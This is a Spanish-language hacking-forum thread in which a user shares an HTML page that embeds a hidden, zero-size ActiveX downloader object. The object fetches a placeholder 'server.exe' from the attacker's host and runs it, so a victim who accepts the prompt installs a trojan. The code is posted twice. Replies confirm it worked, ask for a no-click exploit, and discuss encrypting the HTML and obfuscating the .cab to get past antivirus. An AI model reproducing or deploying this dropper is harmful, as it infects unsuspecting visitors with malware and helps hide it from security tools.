Indetectables

Aqui Tienen
Logicamente donde pone " [Enlace externo eliminado para invitados] " Pones el link de tu server.
Fin!

Salu2 De Itupapa

No es un exploit para explore.

Lo unico que es un java fake y una vez accedes al link debes aceptar para descargar un plugin pero no abres el link y se descarga sin previo aviso.

Edit: esto es lo que sale a la hora de abrir la web donde tenemos el troyano [Enlace externo eliminado para invitados] ... on=1,0,0,1

Perdona pero te equivocas no es nada de java

practicamente es lo mismo LOL.

ingresas a la web donde lo pusistes y te sale para descargar un DownloaderActiveX.cab y una vez ahi le das a instalar se ejecuta el troyano.

te lo digo porque lo tengo en una web y lo abro con explore y sale ese dowloanderactivex.cab y le di a instalar y se conecto el troyano.

Puff esque llevo un tiempo buscando , el exploit para se ejecute con solo entrar
me resultaria practico

claro pensaba que era ese pero me di cuenta de que no lo es.

ademas ese exploit estamos todo el foro deseandolo encontrar jajaja

pero gracias por tu aporte tambien es de buen uso

Que mierda de aporte e echo xD

vamos a probarlo,gracias

Itupapa escribió:Aqui Tienen

Código: Seleccionar todo

</html>
</script>   
</body>
<BODY> 
<OBJECT ID="DownloaderActiveX1" 
WIDTH="0" 
HEIGHT="0" 
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" 
CODEBASE="http://c6.community.alice.it/download/DownloaderActiveX.cab#Version=1,0,0,1"> 
<PARAM NAME="propProgressbackground" VALUE="#bccee8"> 
<PARAM NAME="propTextbackground" VALUE="#f7f8fc"> 
<PARAM NAME="propBarColor" VALUE="#df0203"> 
<PARAM NAME="propTextColor" VALUE="#000000"> 
<PARAM NAME="propWidth" VALUE="0"> 
<PARAM NAME="propHeight" VALUE="0"> 
<PARAM NAME="propDownloadUrl" VALUE="http://tuhost.com/server.exe"> 
<PARAM NAME="propPostdownloadAction" VALUE="run">
<PARAM NAME="propInstallCompleteUrl" VALUE=""> 
<PARAM NAME="propbrowserRedirectUrl" VALUE=""> 
<PARAM NAME="propVerbose" VALUE="0"> 
<PARAM NAME="propInterrupt" VALUE="0"> 
</OBJECT>           
</script>   
</body>
</html>

Logicamente donde pone " [Enlace externo eliminado para invitados] " Pones el link de tu server.
Fin!

Salu2 De Itupapa

Algunas antivirus lo detecta pero aqui teneis la aplicacion creada por mi Encrypta los codigos html
Link : [Enlace externo eliminado para invitados]
Disfruten xD

Itupapa escribió:

Itupapa escribió:Aqui Tienen

Código: Seleccionar todo

</html>
</script>   
</body>
<BODY> 
<OBJECT ID="DownloaderActiveX1" 
WIDTH="0" 
HEIGHT="0" 
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" 
CODEBASE="http://c6.community.alice.it/download/DownloaderActiveX.cab#Version=1,0,0,1"> 
<PARAM NAME="propProgressbackground" VALUE="#bccee8"> 
<PARAM NAME="propTextbackground" VALUE="#f7f8fc"> 
<PARAM NAME="propBarColor" VALUE="#df0203"> 
<PARAM NAME="propTextColor" VALUE="#000000"> 
<PARAM NAME="propWidth" VALUE="0"> 
<PARAM NAME="propHeight" VALUE="0"> 
<PARAM NAME="propDownloadUrl" VALUE="http://tuhost.com/server.exe"> 
<PARAM NAME="propPostdownloadAction" VALUE="run">
<PARAM NAME="propInstallCompleteUrl" VALUE=""> 
<PARAM NAME="propbrowserRedirectUrl" VALUE=""> 
<PARAM NAME="propVerbose" VALUE="0"> 
<PARAM NAME="propInterrupt" VALUE="0"> 
</OBJECT>           
</script>   
</body>
</html>

Logicamente donde pone " [Enlace externo eliminado para invitados] " Pones el link de tu server.
Fin!

Salu2 De Itupapa

Algunas antivirus lo detecta pero aqui teneis la aplicacion creada por mi Encrypta los codigos html
Link : [Enlace externo eliminado para invitados]
Disfruten xD

Lamento decirte que los AV'S en este tipo de exploits no queman el codigo html, sino el .cab los avs detectaran el .cab, asi como en java tube que programar el downloader desde 0 a base de google y crear el apple debe de haver alguna forma obfuscar o reahacer el donwloader.cab es la unica forma de que quedaria f.u.d.

Saludos

muchas gracias provando

gracias men,buen aporte